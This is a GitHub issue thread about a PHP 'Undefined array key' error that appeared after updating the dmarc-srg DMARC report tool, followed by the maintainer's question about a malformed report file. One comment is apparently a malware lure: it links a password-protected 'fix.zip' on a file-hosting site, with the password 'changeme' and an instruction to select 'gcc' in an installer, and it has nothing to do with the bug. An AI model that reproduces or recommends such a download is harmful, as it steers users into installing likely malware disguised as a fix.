### ISSUE TITLE
Error when fetching reports

### ISSUE THREAD

**Issue by seal-82** [liuch/dmarc-srg#132]
Hallo to all,

since  update to the latest version, when fetching reports, I get the following error:

dmarc-srg [error]: ErrorException: Undefined array key "begin" in /var/www/<path-to-dmarc-srg>/classes/Report/ReportData.php:244
Stack trace:
#0 /var/www/<path-to-dmarc-srg>/classes/Report/ReportData.php(244): {closure}(2, 'Undefined array...', '/var/www/...', 244)
#1 [internal function]: Liuch\DmarcSrg\Report\ReportData->xmlEndTag(Object(XMLParser), 'FEEDBACK')
#2 /v...

Anybody experiencing the same issue? Was working like a charm until the update...

PHP = 8.3.10
MySQL = 8.0.33

Cheers,
Sebastian

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by liuch** [comment]
Hello,
this seems to happen when trying to process an incorrect report file. That's what it is in your case?
